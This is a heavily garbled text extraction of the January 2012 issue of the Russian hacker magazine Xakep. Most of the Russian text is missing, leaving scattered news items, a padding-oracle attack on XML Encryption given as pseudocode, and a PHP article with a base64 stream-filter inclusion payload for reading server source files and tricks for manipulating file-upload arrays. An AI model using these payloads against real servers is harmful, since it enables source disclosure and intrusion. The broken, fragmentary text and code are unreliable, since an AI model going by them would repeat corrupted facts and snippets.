Upload
alexey-a
View
298
Download
2
Embed Size (px)
DESCRIPTION
Xakep journal
Citation preview
Fl 01 [156] 2012
ENCRYPTION XML-KOHTEHTA .
,
--
--PHONEGAP:
HTML5
--
ANDROID
:230.
(gam]land hf.fun media UJ =.---; _0 n:1 iiiiiiiiiiiiiiio -~ -N
www.epidemz.net
www.epidemz.net
lntro
: , . , :
100%. , 250 ,
. ? , , :
, . - .
. : 1-3 , - . ,
: >> , . ,
. , nn, , - .
, . , : . , , , .
n : 115 !
shop.g lc. ru/ xakep. , , -
. : !
01/156/201 2
nikitozz, rn. . shop.glc.ru/xakep
vkontakte ru/xakep mag
-,rp.HEP ..... ~
-
PC_ZONE UNIS
nikitozz )) [nikitozfareal.xakep.rul ctstep (steprareaJ. xakep.ru )
c(gorl ([email protected])
Step)) [stepffireal.xakep.rul (magglareal.xakep. ru l
MALWARE SYN/ACK UNIXOID
. Klouniz (alexanderfareal xakep.rul ccdushock>> (adushockfareal.xakep.u )
R- xakep.ru
DVD Ui- Security-pae
ART
ccgol)) (golumfaeal.xakep.u 1 (pofakumekay.com) [ g igorievafaglc . ru ) ixafaeal . xakep. ru l
ant)) (antfareal.xakep.u l ccAd ushock andrushockfareal.xake .ru) 01g1 >> levdokimovdsfagmail.com)
(aliklaglc. rul
-
: . : .
PUBLISHING 000 , 115280, , . , 19, n, 5 , No 21. .: 1495/935-7034, : 1495/545-0906
no
-
. : 1495/935-7034, : 1495/545-0906
n TECHNOLOGY
-
( f il atovacl glc ru l (olgaemlfaglc.ru) /alekhinalaglc.rul
([email protected] ( ] (ta tarekova@g lc .ru l /gospodinovataglc u l ([email protected]/ (bulanovalaglc.rul
/korenfeldlaglc.rul
l koshelevafaglc . u ) [email protected]]
llukichevafaglc.ru )
: V- : claimfaqlc.ru . n : (495)545-09-06 nn : 1495/663-82-77 : 8-800-200-3-999 : 101000, , , / 652,
, 77-11802 14.02.2002 n Zapolex, . 219 833 .
. n . , n , . . - n. : contentrglc.ru . 000 , , 2012
001 www.epidemz.net
HEADER 004
011
MEGANEWS hacker tweets -
COVERSTORY
018 L Encryption
L
016
017
OMOHKASIRI
004
8 Dropbox AdWords Proof-of-cocept SS- 100
COVERSTORY
030
COVERSTORY
,
Adobe
www.epidemz.net
036
042
046
PCZONE hnG:nL5
Windows-apoe
Widows-cce
Widws-?
- 050 Easy-Hack
054
060
064
068
072
D5
- SpyEye Lotus, Lotus Oomio tll X-Tools
074 --
- MALWARE 080
084
Wi32/0uqu: Stuxet
: bootkit test BitDefede, ESET NOD32, F-Secue, Outpost Secuity, Risig >>
- 088 .N-
.NET Famewok
094 ,
098 -
- UNIXOID 102
107
112
117
Linux ! tcpdump
did-
- Ubuntu 11.10 Oneiic Ocelot
- SYN/ACK 118
122
- FERRUM 126 NAS
130
-132
-136
139
142
144
5- 6- NS- Silicon
PoweSP060GBSSOV30525
PHREAKING Loop
, n n n
FAOUNIED
FAQ 8.5 WWW2 w-
2012 NY2k+ 12
www.epidemz.net
EGANEWS SIRI
OMOHKASIRI
111 '.1 ~.)
" On 19 rem1nd me l 's dad's b
ltel 11 11 -11 11 11 11 , . ltel 2011 . . ltel, ltel , ltel . . * .
www.epidemz.net
MEGAN EWS & F , 600 .
POLAROID !
2008 n Polaoid ,
w 11- . ,
Polaoid
n , 11-
n n .
Polaroid : Z340 lnstant Digital Camera. ZINK
Zero lnk Printing, n n . ,
n >> , . n, . , , n ,nn
n . 14 Mn. n 2, 7"
SD. I 43 ] F/3,2. [ -1280 720 n]. Polaroid Z340 n 76 102 , $20 30 . - ,
, no , 25 n. n , Polaroid. Z340 lnstant Digital Camera $300.
AVIRA AESCRIPT.DLL 006
DNS ,
, DNS-apeco.
, , -
n. DNS - Hotmail, Gmail, Google, Microsoft
, Uol, Terra Globo. , , , google.com ,
I- Google, -. n
. n, Google n
n Google Defender, n .
, , 27- n ,
n DNS-cepepax , DNS-.
, , n Ghost Click .
-
, n DNS Changer. OS Windowsoep DNS. I- n 15 ! ,
, n . 100 , n 500 n .
[ n], n
www.epidemz.net
MEGANEWS , CONSUMERIST, RIAA .
! , WI-FI,
, , , . , , . -, ,
10 , /GS. ,
, , , , 802.11 .
-, . , ,
, [ 100 ), 802 .1 1, .
, . , ,
. , - , - .
. , - , .
iPhone45,
,
, . Apple n
- :).
Jj ._d
-
.....
~
-
~ KaneOIAII~
WEXLER.BOOK 7001. Wexler WLR. 7001 7.0" , . 4
( 32 microSDI , , ; F. -
1500 mAh, , . ,
. WEXLER.BOOK 7001 . : 5 990 .
008
. , 1.6.4. . ,
, . , ,
. , , ,
. , CMS,
, . , 1.6.4, 6 , . ,
. . , .
[CDN) .
,0 -'- - ~ - - - -., ,_",,.,,.. 1 - " _ ,._""_, ___ - - ,.
Firefox with Bing
ing
t'
' !..' -' -
..;;.
~ r . ' . -z.. .. \--.:,,,.
j ll_ ~:-~
MEGANEWS ENTENSYS COMMTOUCH , 6, 7% n .
,
>> .
YouTube : Aoymous [Zetasl . , >> , , >> , . , 26 2011
- - . , - .
-. Anonymous , - ,
. , , , -
>> , , . , OpCatel [n
~. , , , , .
, , - , OpCatel .
. . , ,
, , . . .onion- Hidden Wiki,
. , . - , Feedom Host ing. ...
: Feedom Hosting, 40 ,
:
010
Lolita City - , 100 . Feedom Hosting, , >>. Opeat io n Daknet
S- . , Lol ita City SQL- . , , ~ .
n: pastebin . com/1 LH nzEW.
n Anonymous n
. n , ,
- 2000-6000 . 38
.
01 / 156/2012
www.epidemz.net
laEdiStrosar: , >> [ l.
cljkouns: . Ggl-- .
I-: http:!/4 .. 2; http:/196.4; ht.p://71.3; ht.~. ...
ciRogunix: DS/- ICMP efCount TCP/IP [MS11-083I 232 UD-, , 250 52. t.co/aY.PCMyRy.
lafjserna: Micosoft/MSRC . ! Google. ++.
1!!!1 : lilil -
, , , . !
01/156/2012
.
laiLLUMINATI: ,
.
ciWeldPond: Google,
OllyDbg IDA _noRE.exe
.
1!!!1 : lilil -. :1
, Google Wi-Fi, _nomap. :1
clinsitOr: Oday BIND.
: DNS-cepepa BIND, DoS Oday.
Shodan , Siemens Simatic.
t.J;o 1l1Q0b3cq.
1!!!1 : lilil . SCADA-
. S- - .
clmikko: -
, :
MEGANEWS ( 926 ), , . .
! ,
IO'f2~htountry ol~oi!Wpail~ tioUIIpi8CIIIftlleM PC.WNieO.US,...IJ .,_ICWIIIcll'rlllf. ~llwpop~ WUII~4if ... tflt.tllilo -!I\IC11WiW .-,.un ,...,. loulwdCIidlotor&DfiOclns' l'lt ......... IOif ,_,.,otortcrn-
- ~ lociJtionofinfected computers
Nito, ,
.
.
Stuxnet, , - , n , n . , , Symantec. ,
Nito, n , . 29 19 , [,
]. n , n. - , .
[ Poisonlvy]. , . Symantec ,
. Nito : , .
& . ,
.
012
& BSUP a . ,
MAIL.RU GRU , Twitter. , .
HAANDROID'E
FXI , The Cotton Candy
$200, n 2012 . ,
cWindows 8
.
FXI . The Cotton Candy [ - , 21 , , ! . U5-,
. R- 5amsung Exynos 1,2 [ , 5amsung Gala xy 5111.
Mal i-400 , micro5D [ 64 I , Wi-Fi Bluetooth, HDMI2 .1 U5B 2.0. ,
n 1 . h Cotton Candy Android 2.3. , , , Android.
. HDMI, U5B [ n !. Bluetooth , .
Android Market, .
, GOOGLE ?
SSID ,
GOOGLE 01 /156/2012
BITCOIN , BITCOIN
n BitCoin n .
, , . ,
n Mt Gox, BitCoin, , . , BitCoin , , , n
.
lntego, ,
Devii Robber, BitCoin . . ,
, , , , Bi tCoin, , . DeviiRobber 05 ,
n . The Pirate . ,
Graphic Converter 05 . n ,
. , Devii Robber itin - , .
. Devii Robberae , 5afari Vidalia- Firefox, TOR. , D evii Robberoapye
, , . BitCoin . Oper
Microsoft n ,
. , BitCoin.
: 1 n 2, , 50 , 1 .
, n , . ,
, n , Bi tCoi n. - .
n ,
. , . , .
, BitCoin, :
n , , - >>.
013 www.epidemz.net
MEGANEWS LINUX3.1, kl .g .
CTAHAADOBE FLEX FLASH
d Flash n 750 ( 7
% n!
n .
dobe n n n Fla sh l . Fla sh n n , n n Adobe Al R n n.nn n Android PlayBook, n
n . Flash Player n n n HTML5. n n , n n Flash. , , n Apple, , n-n
n Flash Pl ayer iOS. , Flash Playe r n Apple iOS
,- n . Adobe Fl ash n - >> Apple. , n Flex SDK. Flex 4.6 SDK, 29 , n n source.
, , ,
, , n . , , , n . iSpy n 100%. , , n
iPhone ndid n
[magnified keysl. iSpy n n, n,
n n - ! , .
n , 60 . n n 90% . n , n . n , , n n . n DSLR-aep n n 12 . iSpy
magnifi ed key n - .
. DARPA Shdd Challenge
. , .
50 .
AMAZON .
, 2012 .
GGL
42 47 .
011. 01/156/2012 www.epidemz.net
500 Wikimedia.
IPHONE ~~>>
. ",--"
iPhone Dev-Team n iPhone4S.
, .
n, , .
iPhone 45 ,
. Chonic DevTeam - iPhone . , , ,
iPhone, & , .
, , , , iPhoe 45, iPhoe
: iPhone 4 iPhone 3G5, . , ,
>> . , , . : 51 - & , , ,
. & ! >>, >>, , l.
, - youtu.be/gofpeiTXI5U. :
& 1611) ; ; 51 - & T-Mobile; , Wi-Fi !
, );
, iPhoe ; ; EDGE ;
20-30 ; iPhoe, ;
MCAFEE:
space
, >; 51 -, ;
51 - T-Moile . . ,
iPhoe T-Moile, .
75 01 / 156/2012 015
www.epidemz.net
.HEADER
Proof-of-Concept SS-
100
, . , SQL-, , , . , ,- sql-map, SQLi
. , SS- . - . Damn Small XSS Scanne [DSXS).
XSS . Coss-site scipting [XSS]- n , n
n JS-. n . SS- n
. - , , n, n -.
n- n. n n
, SS-.
n XSS zero.webappsecurity.com
016
SS- - n. n- n , n
-n n . n
n L- n GET/POST-anpoca .
[ ] , n .
, n, n SS-n. , -n
. ,
n . n,
L- .. [ n ] ,
n JavaScipt-o. , n, n L- ,
> n n JS-, ... .
DSXS , n SS .
? n Python,
GET- S- SS-,
. Damn Small XSS Scanne [DSXS]
, -, .
, ,
n . n , , n , ,
> - . DSXS ,
. -, DSXS , . n, . n [
, n n], . ,
n. , , n n
Use-Agent, Rf Cookie - . n GitHub [https:Ugithub.com/ stampam/DSXS ]. ::
01 / 156/ 201 2 www.epidemz.net
HEADER
10 DROPBOX ADWORDS 10 2 D , , , . 2 ,
50 , . - $99,00 . , , - 250 . , 1 , ,
- . , , D,
-. , , [, it . ly/ud69i ]. ,
, D - - , , . , , 10 , D
. AdWods !
? , [ it.ly/xNKyB ]. , D- .
, . ? , ,
. - . , AdWods, . ?,,- . , ! , Google, 1000 . . . Qit. l y/AEsg1 $75 AdWods, ,
.: ] , e-mail [ - ], [ - about.me], . e-mail.
[ ] .
? ? , ,- Google AdWods [adwods.google.com ].
-7 >> . [ , , ],
01/156/2012
. [ ] : 1. . 2. [, D]. 3. ,
[, , , , ].
3. >> : , 600 .
. >> ,
. : d, f oline stoage, online backup f, online backup, online backup data, d space.
, - , Google.
URL , D Refeall Status [, httR:Udb.tt/UfxuFBm ]. , .
, , . ,
. , [Cost-Pe-Ciick].
, . -
, , . :] ? - ,
D. -, . -, AdWods, , , [ Google]. . :] :::
Updated Statu.s
3/ 26/ 2011 7:4 5 Joined
3/26/ 2011 6:52 .. Completed
3/ 26/ 2011 6:37 , Joined 3/ 26/2011 6 :08 Joined
3/ 26/2011 5:23 Completed
3/26/ 2011 5:14 Completed
3/ 26/2011 4:49 Completed
3/ 26/2011 4:32 Completed
- 250 Dropbox
017
www.epidemz.net
COVERSTORY
=
BEAST Padding Oracle Attack .NET Framework,
XML Encryption,
L-.
.
018
www.w.org/TR/ mln-r/n XML Encryption
w .
bit l/ur , XML Encryption.
lplaintextl llirstfaplaintext .su, www.plaintext.sul
XML ENCRYPTION XML Encryption, W 2002
, n XML Framewok "ax [ n .NET, Apache Axis2, JBOSS . .[.
- n, Microsoft Red Hat. XML Encyptio n n ,
L- ,- , L-- . n , n
. , AES DES . n n AES [ nn, - CBCI.
01/156/2012 www.epidemz.net
ISJ*iiirIId , n [ 16 , 128 ! . ,
, .
n ~ . IIVI, XOR,
. , :
//
[ 0 ] AES_ENC(k, IV xor [ 0 ]); C[ i] AES_ENC(k, C[i- 1] xor M[i]);
//
[ 0 ] M[i]
AES_DEC(k , [~) xor IV; AES_DEC(k, C[i] ) xor C[i-1] ;
k- , - , - , IV- ll.
n . .
, , : ,
. , , 12
Dx05. ! 16 !, , 15
, 16- 10.
, XM L Encyptio.
! !
01/156/2012
XM L En cyption
IV1[0]
, BEAST Paddig l Attack. -
. . , , n XOR IV MSK, IIV MSK, C[DJI [) MSK. , .
, MSK, n , . ,
. , , . XML Encyptio , .
, , , ASC II . ASCI I . , NULL ! Al,
! Bl. , , , >>. ,
, n . ,
, 16 , tue, [) = AES_DEC_ CBC[k, IIV, C[OJII NULL, false -
. , , .
: 1. IV1,
[I V1, C[O] I . niV, lniV, C[O]I . tu, IV1 = iV, false .
019
www.epidemz.net
COVERSTORY
WS-SECURITY
WS-Security - SOAP, _
-. WS-Secuity XML Encyption XML Signatue.
, 2-3 , , , .
2. [, AES_DEC , ! . :
msk = repeat
msk++ IV2 = IVl xor ( . .. e llmsklle ... )
11 msk j -
until Server((IV2, [ ] )) == true
retur X[j] = ASCIICode(NULL) xor IV2[j] 11 "
:
Iput: C=(IVl, []), -
Output: j- X[j] = AES_DEC(k, [])
. j- , , j- . , ? : . [
!:
AES_DEC_CBC(k, (IV2, [])) IV2 xo r [].
IV2 xor AES_DEC( k, [])
,
I . [] ,
[0]. XOR [] IV.
. .
XML XML ENCRYPTION Extesie Makup Laguage [ XM LI . XML ,
[odel. , , XML < >
. & s- & >>. XML XML ti.
W XML Sigatue W XML ti, XM L [
, . .l XML.
XML ti, . , ,
[ , , . . l . , , , .
. . ,
, . .
John Smith l
A123456 ...
XML Encryption
020 01 / 156/ 2012 www.epidemz.net
n n , . n n n,
n L- . , L-, . ?:-]
XM L ti n n L- ! XML], n . n n . n td Element -, L-
. Encypted Content , n
, , . . n Encypted Text Contet, n Encypted Contet, , . , n n
. , n XM L Famewok'o n n .
- . XM L E cyption n n
UTF-8, n , n
. n UTF-8- , , lline feed ]
lcaiage tu]. , n ASCII n UTF-8.
n, ASCII n n 128 ! 4]. ,
, .
n n -. nn Apache Axis2 Famewok, Rampat WS-Secu ity. n XML Encyption XML Signatue SOAP.
n Axis2 Famewok, n lmessage flow]. lmessage flow]- n , S- ! ],
n n. S- n, n Message
Receive, , , Sevice n .
Axis2 : st, Secuity Dispatch. Secuity,
XM L SIGNATURE
XML Signature - n W. n n n XML.
01/156/2012
XM L Encyption
?
v Secuity, . , , , . . ,
!, , -, , . ). -,
, , . Axis2,
,- -. Paddig Oracle Attack,
l-, ASP.NET), .net.
, . , XML S-.
Dispatch. Message Receive, message flow SOAP n , .
, Axis2 . :-]
AXIS2 - , Axis2. ,
, tue false
. n secuity fault. secuity fault : 1.
. , , , ? , n 001 OxlO, n n .
2. . n>> , ASCII Oxl F ! 09, , D- , ].
- L- , & IOx26] > > .
.
n , ASCII ! ]. n n XML n >> >,
.
021 www.epidemz.net
COVERSTORY
. , , , ,
, 16- , tue false. ,
Dec. Char . Dec. Char. Block Block 2 00 NUL 32 20 SPC 1 01 SOH 33 21 ! 2 02 STX 34 22 " 3 03 35 23 # 4 04 36 24 $ 5 05 ENQ 37 25 % 6 38 26 & 7 07 BEL 39 27 ' 8 08 BS 40 28 ( 9 09 41 29 )
10 LF 42 2 * 11 VT 43 2 +
12 FF 44 2 ' 13 OD CR 45 2D -
14 so 46 2 15 OF SI 47 2F 1
Block 1 Block 3 16 10 DLE 48 30 17 11 DC1 49 31 1 18 12 DC2 50 32 2 19 13 D 51 33 3 20 14 DC4 52 34 4 21 15 NAK 53 35 5 22 16 SYN 54 36 23 17 55 37 7 24 18 CAN 56 38 8 25 19 57 39 9 26 1 su 58 : 27 1 ESC 59 ; 28 1 FS 60 < 29 1D GS 61 3D = 30 1 RS 62 > 31 1F us 63 F ?
ASCII
, . [ ,
] [ ]. , , XML 5chem'
[L-] . , ,
, , , . ,
, .
[ . ], u .
~ , ,
XML 5ignatue. , n XML 5ignatue Wappig, , n
nn / . n- , n n .
01/156/2012
XML Encyption
Dec. Char. Dec. Char. lock 4 lock 6
64 40 96 60 ' 65 41 97 61 66 42 98 62 67 43 99 63 68 44 D 100 64 d 69 45 101 65 70 46 F 102 66 f 71 47 G 103 67 g 72 48 104 68 h 73 49 I 105 69 i 74 4 J 106 j 75 4 107 k 76 4 L 108 1 77 4D 109 6D m 78 4 N 110 n 79 4F 111 F
Block 5 Block 7 80 50 112 70 81 51 Q 113 71 q 82 52 R 114 72 r 83 53 s 115 73 s 84 54 116 74 t 85 55 u 117 75 u 86 56 v 118 76 v 87 57 w 119 77 88 58 120 78 89 59 121 79 90 z 122 7 z 91 5 [ 123 7 { 92 5 \ 124 7 1 93 5D ] 125 7D } 94 5 - 126 7 - 95 5F
-
127 7F DEL
. - , n -, -, n . n -, ,
n. , , ,-
, , [, 150/IEC 19772:2009], n
XML Encyption . , , 051 [n, XML Encyption 55L/TL5, n 5] .
, , , , epic fail . , XML Encyption n , n n side-channel, n . , , - , n . n Juaj 5omoovsky i Jage, , n n . ::
023 www.epidemz.net
.
fopen, , file_get_ contents . .
, ,
.
PrOxor [php.m4sqllagmail.com, rdot.org/foruml
$ FILES
, .
'-"
1 il. ly/sfDcys
noce L ightig Template.
blt.ly/ttvWV -n Lightning-Template.
it.!y/mdrdqfca,
File path injection. pastebln.com/1edSuSVN - n
File path injection.
it . ly/g6ztD- ,
$_FILES.
n
n .
, , 4.3 . [
, . . l > . .
, , . , :
print _r(st r eam_get _fi lters());
, . steam _filter_append/
~~ . .. ....
- ....
_ ___ ,.
.....__llriWolo,.., 1 ....... -.
... ... ,.., .L.oc ...... ",....,__Pif' ': , ~qt\0~ lt II PHDOd( ' lllrJWII ' ) I , .
, .. '.. t-l&tO ftiH~ t ... t - tM kLU I ~>laLO""
-I. ,koll -~-" . -l" or t llo """'""' ""-1 : r_t...., ...,.. --.1-..... " ot cooLol lotpor.,. ...,.. N-ltd tM-
n. ~r .,... - tA8'p tr.., tor 'Dltto -L
steam_filte_pepend n n php://f ilte. , , . :
$fp = fopen( 'php ://output ' , ' w' ); stream_filter_append($fp,
'convert . quoted-printae-encode ' ); fwrite($fp, "I \ v Love \ v PHP .\n" );
, POST, Base64 :
readfile( "php: //filter/ read=convert . base64-encode/ resource=php: // input" );
, , . , ft-, gz-, :
copy( 'compress.zlib: // ftp:/ / user:[email protected] : 21/ path / file. dat. gz' , '/local / / of / file . dat' ) ;
php://filte - . ,
include ($_POST[ 'inc ' ]) ;
allow_ul_ic l ude = Off>> RFI.
-- S- :
inc=php://filter/read%3Dconvert.base64-encode/resource%3D/ path/script.php
, - . !
~ , , , . - . ,
12. . , filte ! ] .
, . $this-> _data >> :
private $_data;
while ($bucket = stream_bucket_make_writeae($in)) $this- >_data .= $bucket->data; $this->bucket = $bucket; $consumed = ; }
, $closing TRUE. :
01/156/2012
if($closing) { $consumed += strlen($this->_data); $str = nl2br($this->_data); $this->bucket->data = $str; $this->bucket->datalen = strlen($this->_data);
i Secure [9ist.github.com/600388/cd99ae03c3
{{ tit1e }}
{{ tit1e }} 11 {{ name }} 1 {{ meagelafe }}
Iteiil {% fo~ ite!il in ite!il %}
{% if ite!il %} {{ ite!il }} {% endif %}
{% endfo~ %}
sample.php #
< ?php require_once 'Lightninqemp1ate.php' ;
~ite!ils = array( 'hoge' , null, 'fuga' , , 'piyo' ,
h ) ;
$1t = new Lightninqemp1ate( '8Iilp1e . htm1' ); $1t->tit1e = 'Samp1e Temp1ate' ; $1t->n8Ule = 'Yo~1d' ; $1t->Iilessage = 'hi'' ;
lG $1t->ite!ils = $items ; echo $lt;
1
sarnple_cache.php #
1 1
< ?php require_once 'Lightninqeiilp1ate . php' ;
te!ils = array ( 'hoge' , null, 'fuga' , , 'piyo' ,
);
$1t = new Lightninqemp1ate( 'amp1e.htm1' ,
new Lightninqeiilp1ateCache_Fi1e( '. /cache' ) ); $1t->title = ' Samp1e Te!ilp1ate' ; $lt->n8Iile = 'Yo~1d' ;
$1t->meage = 'hi!' ; $1t- >items = $ite!ils ;
n Lightning Template
025 www.epidemz.net
COVERSTORY
}
if ( !empty($t his->bucket - >data)) stream_bucket_a ppend($out, $th is->bucket);
return PSFS_PASS_ON;
, PSFS_PASS_ON. ,
. . :
stream_fi lter_register( 'convert.nlZbr_string ' , 'nlzbr_filter' );
, .
, ,
, . Google Code Seach. steam_filte_egiste.
Lighting-Temp l ate ! !, . , sample.html:
{{ tit l e }}
2 class nl2b_fi~e extends _Use_F i~e { 3 private $_data; 4 /* n t 5 function onCeate ( ) 6 { 7 $this-> _data = "; 8 eturn true; 9 }
1 /* n / 11 puiic function fi~er($ i n , $out , &$consumed, $closing) 12 { 13 /* 14 '$_data' 15 . , 16 while($bucket = steam_bucket_make_writeae($ i n)) 17 { 18 $this-> data .= $bucket->dala; 19 $this->bucket = $bucket ; 20 $consumed = ; 21 22 23 /* 24 (ukt). 25 ., 26 if($closing) 27 { 28 $consumed += stlen($this-> _data); 29 $st = nl2b($bucket-> _data}; 30 31 $this->bucket->data = $st; 32 $this->bucket->datalen = stlen($this-> _data); 33 34 if(!empty($this->bucket->data)) 35 steam_bucket_append($out , $this->bucket); 36 37 etum PSFS_PASS_ON; 38 39
026
include ( "./LightningTemplate.php" ); $lt = new Light ni ngTemplate(' . / sample.html' ); $lt->title = ' Title' ; echo $l t;
L-:
< head> My Title
, L- . , include,
. , - , . ,
, L-. :
puic function fi l ter($i n, $out , &$cons umed, $clos i ng) while ($bucket = stream_bu cket_ma ke_writeae($in))
$patterns = array (
'1\{%\s+if\s+(.+?)\s+%\}/e' ,
); $replacements = array (
'"'" ,
); $bucket->data = preg_replace($patterns,
$replacements, $bucket->dat a) ;
, '"
- php_use_filte. : filte, t, oCiose. filte, : 1. $i - , ,
.
- , phpseUm44, hello.txt.
, !
). $_FILES :
Array ( [uploadfile] => Array (
[name] => hello.txt [type] => text/plain [tmp_name] => /tmp/phpseUm44 [error] => [size] => 33
, $_FILES[uploadfile][type] Cotent-Type, . , -,
, :
$_FILES[ " file " ][ "type" ] == " image/ gif"
, , . getimagesizel). , , , IF-
, . , . , - pic.php.myext -. , - , . , $_FILES.
, ,- . bugs . php.et ,
, - . :) ,
/ , $_FILES[uploadfile] [name] . , , -. Uni-
027 www.epidemz.net
COVERSTORY
- . Windows-aax n . .
. $_FILES. Qwaza d ot.og . BlackFan, , , . . , ,
:
foreach ($_FILES[ "file" ][ "tmp_name" ] as $key => $name) { echo "Size:" .$_FILES[ "file" ][ "size" ][$key]. "cbr/>\r\n" ; echo "tmp name: " .
$_FILES[ "file" ][ "tmp_name" ][$key]. "cbr/>\r\n" ;
if($_FILES[ "file" ][ "size" ][$key] >0 && $_FILES[ "file" ][ "size" ][$key] date); ..... ,
:. lt: : NOICI : defa.lt :
lithis->tiarra->nouce:l!essaqe (lit.hi.s->da.tal: "....,
licon:sua!:d - Sbuc.t:et- >do.t..a.le:n; streaa_ucket_app~d ( ,out, 'uctet);
r:il r i nitiali:r:e:r
@retum bool '1
.-uc h8ctioa o.c:reu.e () (
(1sset( lit.his->par;8:a5{ 'socket' ))) ( lisock~m.aa~ ~this->parus[ 'sock~t' ];
U ( 1.ss~ t(Hh1s->paraas{ 'chann~l' ])) ( HJus- >channe.l - ~thls->poru.s{ ' chann~l' );
U ( 1.ss~t(~th1s->par~ [ aobl' JI) ( Sth1s->ted~ Sth1s->araas r 'aod~' 1:
onCeate n
028
cform action= "upload.php" method= "POST" enctype= "multipart/form-data" >
cinput type= "Hidden" name= "AX_FILE_SIZE" value= "leeeeeee" >
cinput type= "file" name= "file[size][" >
cinput type= "submit" value= "submit" >
- $_FILES :
$_FILES[ "file" ][ "tmp_name" ][ "[name" ]
n :
$_FILES[ "file" ][ "tmp_name" ][$key]
, $_FILES ( , ) . , .
( upload.php), L-, secet. php, , upload .php,
: 1. secret.php,
(, , ). 2. , .
0
. , , .
, imageceatefom* ,
, l , .,
, . , base64_ecode , , , :
$jpegimage = imagecreatefromjpeg( "data://image/jpeg;base64J" . base64_encode(
isql_result_array( 'imagedat~])); imagejpeg($jpegimage);
, , .
, ,
. , , .
, -, , , , imageceatefom*/image*, :
foreach ($_FILES[ "file" )_( "tmp_name" ]_E.L$key => $name) { echo "Size:" . $_FILES[ "file" ][ "size" ]($key]. "\r\n" ;
}
echo " tmp name:" .$_FILES["file" ) [ "t>_name" ]($key]. "\r\n" ;
$img = imagecreatefromjpeg( $_FILES [ "file" ] [ "tmJJ_name" ] [$key]);
imagejpeg($img, ' ./new_' .$ke:,
COVERSTORY
S, I
& - . . n
- - - : n: ~~ n.
0 .
E\comsoft. ona:~vanced eBook ss, n_~1 , - Defcon.
www.epidemz.net
r.t - .... , IT, , ?
il ! ~ . .- . ][J,
, 6. - 100 . . 20 . . ,
- ... , , - , . -
. . , - ,
. , , - ...
COVERSTORY , , . , , , : . , , . - , . , , ,
, .
?
1 ~ ,
- ,
. . , . , ,
[ 97- ! . , , ,
IT. . , , , 80 %.
Elcomsoft, . , , , , . : .
. n
, ... .
r.1 .:;.t ELCOMSOF
?
l , ~
. passwod v, , . , , . .
, . , EFS
Recovey . - , Active diectoy.
compute foesics . , ,
, .
, , , -
. , Defco 2001
, - . - , - . - .
, . , . , , ,
, .
.
, , ELCOMSOFT.
1 . ~ Access, . ,
... . , , . - , -
032
. :1
1 , ~ ,
. - , , . 90-
- , . Elcomsoft, . .
r,1 , .
1 , , , ... ~ ,
Apple, iOS [ , iPhoe 45 iPad21. , . , ,
. , ,
.
r.1 APPLE .:;.t ,
, ? ADOBE .
l , ~ ,
compute foesics. , , . , ... Apple , . , , .
r.1 ... PDF
ELCOMSOF ... ?
l , pdf . ~
. : >.
- . , .
r.1 .:;.t ADVANCED PROCESSOR, - 2001 DEFCON?
l , . , ~ ,
df-, . 2001 .
,
, . , , . . Defco. , ,
12 20 . , , , Adobe.
. Defco , Advaced eBook ss,
. , , ,
.
m ? :1 01 /156/2012
www.epidemz.net
l , ... , ~
, . - Spot the fed ! ).
!, ),
, , - .
, , , - ,
. . , , , ,
, .
r.1 , . 1.;.1
, , .
l ~ ~ ,
01 /156/2012
, , . , , . ,
, , . .
. -.
. , ,
. : ,
. -,
11 . . , - ,
, , , , . . , , . :
. , , .
. , .
- , . , , , , , .
- .
r.1 , 1.;.1 ? ?
l _ . ~ ,
, 21 . , .
, . 11 -, ,
. , . - , , , ... ,
. :) , , - .
, . , , . - . , - .. .
, .
r.1 , 1.;.1 ADOBE
?
l , , -, ~ Adobe
. - ,
Adobe, . Adobe , , . , : . ,
.
, , ?
, , Elcomsoft. ,
COVERSTORY , .
, , , , , . ,
. , n
.
r.1 ... ?
l , l -) ~ 50
, Elcomsoft. , , , .
, . , . , , . .
, , - , . . ,
2001 , 6 , 2002
. , ! ), : , , , . depositio
! ) - . , : - ?>>. , : .
, Elcomsoft
. . 2001 , .
r.1 , , ... 2002.
?
l Elcomsoft ~ ,
Puic lteest l. , , 17
Elcomsoft . . , ,
. .
,
? , , - ?
l . ~ .
, .
, - , . , .
, , .
r.1 ~- ... , ?
?
l , ~
. . - .
r.1 , ...
. ?
l , ... ~ . ,
. , , -
, .
?
- , . , , ...
, , , . ,
, ,
. 9 .
r.1 CONFIOENCE 2.0 ...
CANON. ?
l , ~ I) .
- , 3000, ,
, 3500. , n
, , , ,
. n 300,
. , .
n. , Magic Laten, Canon , . Hackes Oevelopes Kit, , >> >> .
, n , ,
. CONFidece 2.0. Niko . lus-) .
, , . , . Nikon .
r.1 5-10 ... ,
, ?
l , ~ , Pactical
cyptogaphy . , , , . ... , , . ,
. , . , , .
r.1 ... ?
, ?
l , . ~ ,
. - ,
. ,
. , . ,
, , , .
, 1 % , . , . , , IT,
- : n >>. , .
, , , . :::
01 /156/2012 www.epidemz.net
Preview
11, n n n n
: n ~ n ~n ~ n . . n n . n n
n n, n n Lotus Domino Contolle n n .
n, n, n I .
PCZONE
36 HTML5
And oid iOS, ? n. n n n .
500 n, . n
n .
01/156/2012
30 . .
? n n, n , n
n .
MALWARE
DUQU
n ,
n n n
Stuxnet.
? - .
, .
I! , MBR, n, 5 nn
.
035
www.epidemz.net
PCZONE
PhoneGap:o HTML5
- , , .
todo list Adroid iOS, , .
Objective-C Java , , PhoneGap.
._ .....
~-----
---
-
... .....
...
iOS
036
, Windows 8, , , , n n HTML5. , - , - , n n, . , n n n n HTML, JavaSc i pt
CSS!, PhoneGap. n n n n nn n: iOS, Andoid, Windows Phone, lk, WebOS, Symian Bada.
n n n [n, Objective-C iOS), API . , n n n,- HTML5 PhoneGap API. n L-, , ! API n n , n n n
: , n, [ ), n , , ! ), . . , - . n jQuey Moile Secha,
, [ n ) . n , n , n nn . - .
n iOS- -, AppStoe, n
:). : , , , , Andoid. , n ,
01/156/2012 www.epidemz.net
.
, . iOS .
. n n .
cdiv data-role= "page" data-dom-cache= "true" class="page-map" id= "index" >
cdiv data-role= "header" > hl > n / hl > href= "#points" class= "ui-btn-right" id= "menu-points"
data-transition= "pop" >To c/a> c/div> cdiv data-role= "content" > cdiv id= "map-canvas" >
! -- --> c/div> c/div> c/div>
data-dom-cache="true" , . data-transition="pop",
>. , jQuey Moi l e, [ it.ly/vtXXM I .
PHONEGAP
, PhoneGap
> . ! . PhoneGap Build [build .phonegap.com l n .
. , , .
- PhoneGap, . lgithub.com/ phonegap/phonegap-p luginsl,
iPhone, Android, Palm, Bla ckBerry. iOS 20 r: BarcodeScann er [ -!. AdPI-ugi [ iAdl, NativeCont rol s l iOS l .
037 www.epidemz.net
PCZONE
n :
